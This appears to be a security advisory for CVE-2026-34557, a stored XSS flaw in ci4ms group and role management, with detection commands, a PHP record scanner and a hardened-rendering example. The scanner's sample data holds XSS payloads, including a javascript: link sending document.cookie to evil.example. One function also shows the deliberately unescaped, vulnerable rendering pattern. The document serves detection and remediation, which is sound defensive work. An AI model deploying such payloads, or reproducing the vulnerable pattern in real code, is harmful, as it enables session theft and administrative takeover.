Platform
php
Component
ci4-cms-erp/ci4ms
Fixed in
0.31.1
0.31.0.0
CVE-2026-34557 describes a critical stored DOM cross-site scripting (XSS) vulnerability in ci4-cms-erp/ci4ms. Input fields in the group and role management features are not sanitized, so an attacker can submit JavaScript that is stored server-side and later rendered without output encoding in privileged administrative views. The script then executes in the administrator's browser, within the application's origin and with the administrator's session. The vulnerability affects ci4-cms-erp/ci4ms versions up to and including 0.28.6.0; a fix is available in version 0.31.0.0.
The impact is significant because the payload is persistent and executes in an administrative context. Once stored, the script runs each time an administrator opens the affected group or role management page, letting the attacker read session cookies that are not marked HttpOnly, redirect the administrator to a phishing site, or issue requests on the administrator's behalf, including changes to groups, roles and other privileged settings. Full control of the administrative interface is therefore a realistic outcome, and any server-side capability reachable from that interface (file uploads, configuration changes) extends the reach further. Because the payload is stored, a single injection affects every user who views the compromised record, which is what makes stored XSS a common route to persistent access.
CVE-2026-34557 was publicly disclosed on 2026-04-01. The CVSS score of 9.1 reflects the severity of a successful attack, not its likelihood; the EPSS estimate of 0.05% (16th percentile) currently indicates a low probability of exploitation in the wild. As of this writing there are no publicly known campaigns targeting this vulnerability, and it is not listed in the CISA KEV catalog, but stored XSS in an admin interface is straightforward to exploit once the injection point is known, so the severity warrants monitoring. Public proof-of-concept code may emerge and would raise that risk.
Organizations running ci4-cms-erp/ci4ms at version 0.28.6.0 or earlier are at risk, particularly where administrators routinely review group and role data and where few compensating controls (Content Security Policy, HttpOnly session cookies, a WAF) are in place. Shared or multi-tenant deployments are a particular concern: any account allowed to create or edit group or role records in one tenant can plant a payload that fires in the browser of an administrator who manages the whole instance.
• php: Examine the web-server and application logs for script-like input or errors tied to group/role management. Apache's error.log records exceptions and malformed requests, not POST bodies, so this only surfaces payloads that reached a URL or an error message; grep needs -E for the alternation.
grep -Ei 'javascript:|alert\(' /var/log/apache2/error.log
• generic web: Fetch the group/role management views as an authenticated administrator and check whether script-like content is rendered back. Without the admin session cookie (supplied here with -b; cookie name and value are placeholders) the request only returns the login page.
curl -s -b '<session-cookie-name>=<value>' 'https://your-ci4ms-site.com/admin/groups/edit/1' | grep -Ei 'javascript:|alert\('
• generic web: Check stored group/role names and descriptions for HTML tags, event handlers or javascript: URIs, either directly in the database or in a SQL dump.
grep -Ei 'javascript:|<script|on[a-z]+=' /path/to/database/groups_table.sql
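The grep checks above stop at single keywords. The following is an added example, not ci4ms project code, of a small PHP scanner that applies a broader set of stored-XSS indicators (script tags, event-handler attributes, javascript: URIs, dangerous elements) to group/role records, including entity-encoded variants. The rows are constructed sample data; the table and column names in the comment are assumptions and should be adjusted to the actual ci4ms schema.

```php
<?php
// Added example (not ci4ms project code): scan stored group/role records for
// script-like content that points at CVE-2026-34557 abuse. The rows below are
// constructed sample data; in a real check fetch them from the ci4ms database
// (table and column names are assumptions, adjust to your schema).

declare(strict_types=1);

/** Patterns that should never appear in a group or role name or description. */
const SUSPICIOUS_PATTERNS = [
    'script_tag'    => '/<\s*script\b/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',
    'js_uri'        => '/javascript\s*:/i',
    'html_tag'      => '/<\s*(img|svg|iframe|object|embed|style|link|meta)\b/i',
];

/**
 * Return one finding per matching (row, column, pattern).
 * Each row is checked both raw and entity-decoded, so a payload stored as
 * "&lt;script&gt;" by a lax sanitizer is still reported as an attempt.
 *
 * @param array<int, array<string, string>> $rows
 * @param string[] $columns
 * @return array<int, array{id: string, column: string, pattern: string, value: string}>
 */
function findSuspiciousRows(array $rows, array $columns = ['name', 'description']): array
{
    $findings = [];
    foreach ($rows as $row) {
        foreach ($columns as $col) {
            $value   = (string) ($row[$col] ?? '');
            $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
            foreach (SUSPICIOUS_PATTERNS as $label => $regex) {
                if (preg_match($regex, $value) || preg_match($regex, $decoded)) {
                    $findings[] = [
                        'id'      => (string) ($row['id'] ?? '?'),
                        'column'  => $col,
                        'pattern' => $label,
                        'value'   => $value,
                    ];
                }
            }
        }
    }
    return $findings;
}

// Constructed sample rows standing in for a query such as
// "SELECT id, name, description FROM <groups table>" (table name assumed).
$sampleRows = [
    ['id' => '1', 'name' => 'admin',   'description' => 'Site administrators'],
    ['id' => '2', 'name' => 'editor',  'description' => 'Can publish & edit posts'],
    ['id' => '3', 'name' => '<img src=x onerror=alert(document.cookie)>', 'description' => ''],
    ['id' => '4', 'name' => 'support',
     'description' => '<a href="javascript:fetch(\'//evil.example/\'+document.cookie)">help</a>'],
];

foreach (findSuspiciousRows($sampleRows) as $f) {
    printf("row %s, column %s: %s in %s\n", $f['id'], $f['column'], $f['pattern'], $f['value']);
}
```

Rows 1 and 2 produce no findings (a bare `&` is not a marker); row 3 is reported for the `img` element and the `onerror=` handler, row 4 for the `javascript:` URI. Run it against a database export rather than a live admin page so that legitimate inline scripts of the admin UI do not pollute the result.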
Exploit status
EPSS
0.05% (16th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-34557 is to upgrade ci4-cms-erp/ci4ms to version 0.31.0.0 or later, which contains the fix. If an immediate upgrade is not possible, apply temporary workarounds in the application itself. Output encoding is the decisive control: HTML-entity encode group and role fields wherever administrative views render them, so the browser treats stored content as text rather than markup. Input validation is a useful second layer: restrict group and role names to an allow-list of expected characters, but do not rely on it alone, since free-text fields such as descriptions cannot be validated into safety. A Web Application Firewall with XSS rules can filter common payloads but is bypassable and should not replace the code-level fix. Marking the session cookie HttpOnly and deploying a Content Security Policy that disallows inline script limit what a successful injection can do. Finally, review existing group and role records for payloads stored before the upgrade; they remain in the database and should be cleaned up rather than left to the new encoding alone.
Update CI4MS to version 0.31.0.0 or later. This version fixes the stored cross-site scripting (XSS) vulnerability in group and role management and prevents the execution of malicious JavaScript in the administrative context.
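To make the workaround concrete, the following added example (not ci4ms project code) shows the vulnerable rendering pattern beside its hardened form and an allow-list validator for group/role names. The function names, the field names and the attacker input are assumptions chosen for illustration; `htmlspecialchars` is used so the file runs without the framework, where CodeIgniter 4's `esc()` helper (default `html` context) performs the same encoding.

```php
<?php
// Added example (not ci4ms project code): vulnerable view pattern beside the
// hardened form, plus allow-list validation for the write path.
// Function and field names are assumptions chosen for illustration.

declare(strict_types=1);

/** Vulnerable: interpolates the stored value straight into the admin view. */
function renderGroupRowVulnerable(array $group): string
{
    return "<tr><td>{$group['name']}</td><td>{$group['description']}</td></tr>";
}

/**
 * HTML-entity encode for the element-body and attribute contexts.
 * In CodeIgniter 4 the framework helper esc($value) does the same job;
 * htmlspecialchars is used here so the example runs stand-alone.
 */
function escHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened: every stored field is encoded at the point of output. */
function renderGroupRowSafe(array $group): string
{
    return '<tr><td>' . escHtml((string) $group['name']) . '</td><td>'
         . escHtml((string) $group['description']) . '</td></tr>';
}

/**
 * Input validation for the write path. A group/role name is an identifier,
 * so an allow-list is appropriate: alphanumerics, space, underscore, dot and
 * hyphen, 1 to 64 characters. Descriptions are free text and are left to
 * output encoding; validation alone would not make them safe.
 */
function isValidGroupName(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9][A-Za-z0-9 _.-]{0,63}\z/', $name);
}

// Constructed attacker input of the kind the advisory describes.
$payload = [
    'name'        => '<img src=x onerror=alert(document.cookie)>',
    'description' => 'Regular "editors" & reviewers',
];

echo "vulnerable: " . renderGroupRowVulnerable($payload) . "\n";
echo "hardened:   " . renderGroupRowSafe($payload) . "\n";
var_dump(isValidGroupName($payload['name']));
var_dump(isValidGroupName('content-editors'));
```

The vulnerable line emits the `<img>` element verbatim, so the `onerror` handler fires as soon as an administrator opens the page; the hardened line emits `&lt;img src=x onerror=...&gt;`, which the browser displays as text. In a CodeIgniter 4 controller the same allow-list can be enforced with the built-in `regex_match[...]` validation rule before the record is written, but the encoding in the view remains the control that actually closes the vulnerability.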
CVE-2026-34557 is a critical stored DOM XSS vulnerability in ci4-cms-erp/ci4ms, allowing attackers to inject malicious JavaScript into group/role management fields that later executes in the browser of an administrator viewing those records.
You are affected if you are using ci4-cms-erp/ci4ms versions 0.28.6.0 or earlier. Upgrade to 0.31.0.0 to resolve the vulnerability.
The recommended fix is to upgrade to version 0.31.0.0 or later of ci4-cms-erp/ci4ms. Implement input validation and output encoding as a temporary workaround.
While no active campaigns have been publicly reported and the EPSS estimate is currently low, the vulnerability's criticality and ease of exploitation once an injection point is known mean it should not be left unpatched. Continuous monitoring is advised.
Refer to the official ci4-cms-erp/ci4ms project repository or website for the latest advisory and security updates.